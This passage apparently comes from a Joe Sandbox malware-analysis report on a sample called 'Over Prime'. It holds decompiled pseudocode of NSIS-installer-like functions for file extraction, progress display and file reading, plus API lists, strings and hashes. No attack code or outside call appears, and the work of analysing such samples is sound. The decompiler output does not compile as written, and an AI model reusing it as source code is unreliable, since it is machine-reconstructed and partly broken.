					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x425a20
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x425a20
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dd
0x004032df
0x004032df
0x004032e6
0x004032eb
0x004032f6
0x004032f6
0x00403308
0x004034bd
0x004034bd
0x00000000
0x0040330e
0x00403312
0x0040346a
0x004034ad
0x004034af
0x004034af
0x004034bb
0x004034c2
0x004034c5
0x00000000
0x00000000
0x00000000
0x00000000
0x004034bb
0x0040346f
0x00000000
0x00000000
0x00403471
0x00403474
0x00403477
0x0040347a
0x0040347c
0x0040347c
0x0040348c
0x00000000
0x00000000
0x0040349a
0x00403464
0x00403464
0x004034bf
0x004034bf
0x00000000
0x004034bf
0x0040349c
0x0040349f
0x004034a6
0x00000000
0x00000000
0x00000000
0x004034a8
0x00000000
0x00403474
0x0040331e
0x00403320
0x00403327
0x0040332e
0x0040332e
0x00403335
0x0040333d
0x00403347
0x0040334c
0x00403354
0x0040335e
0x00403361
0x00000000
0x00000000
0x00000000
0x00000000
0x00403367
0x00403367
0x00403367
0x0040336f
0x00403371
0x00403371
0x00403382
0x00000000
0x00000000
0x00403388
0x0040338b
0x00403391
0x00403397
0x00403397
0x004033a2
0x004033a8
0x004033ad
0x004033b4
0x004033b7
0x00000000
0x00000000
0x004033bd
0x004033c3
0x004033c5
0x004033ce
0x004033d0
0x00403401
0x00403407
0x00403413
0x00403418
0x00403418
0x0040341d
0x00403458
0x00000000
0x00000000
0x00000000
0x0040341f
0x00403423
0x0040343a
0x0040343f
0x00403442
0x00403445
0x00403448
0x0040344c
0x00000000
0x00000000
0x00000000
0x00403452
0x0040342c
0x00403433
0x00000000
0x00000000
0x00403435
0x00000000
0x00403435
0x0040341d
0x00403460
0x00000000
0x00403460
0x00000000
0x00403367

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

ZB, xrefs: 004033A2, 004033BD, 0040343A
A, xrefs: 0040347E
*B, xrefs: 004032DF
A, xrefs: 00403374
... %d%%, xrefs: 004033FB
}8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ ZB$ A$ A$... %d%%$}8@
API String ID: 551687249-3683892814
Opcode ID: 56b0f536eed8a80aa022ebbc190999bc8f902075b9028e03b58b2e81be541d07
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: 56b0f536eed8a80aa022ebbc190999bc8f902075b9028e03b58b2e81be541d07
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nse70B.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nse70B.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nse70B.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nse70B.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll, xrefs: 00401835, 00401851
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nse70B.tmp, xrefs: 00401821, 0040183F

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nse70B.tmp$C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll$Call
API String ID: 1941528284-1637066276
Opcode ID: 1f818d2d0e80a878676138eafe39d229bc6d091a70e5c7c4d44bb1fa455db58e
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: 1f818d2d0e80a878676138eafe39d229bc6d091a70e5c7c4d44bb1fa455db58e
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4; // 0xb004e
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004055a5
0x004055af
0x004055b4
0x004055ba
0x004055c5
0x004055c8
0x004055cb
0x004055d1
0x004055d1
0x004055d7
0x004055df
0x004055e2
0x004055ff
0x00405603
0x0040560c
0x0040560c
0x00405616
0x0040561f
0x0040562b
0x00405632
0x00405636
0x00405639
0x0040564c
0x0040565a
0x0040565a
0x0040565e
0x00405660
0x00405663
0x00000000
0x00405663
0x004055e4
0x004055ec
0x004055f4
0x004055fa
0x00000000
0x004055fa
0x004055f4
0x004055e2
0x0040566f

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00403418), ref: 004055FA
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll, xrefs: 004055C0, 004055D0, 004055D6, 004055F9, 00405605

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll
API String ID: 1495540970-1239469613
Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027b6
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
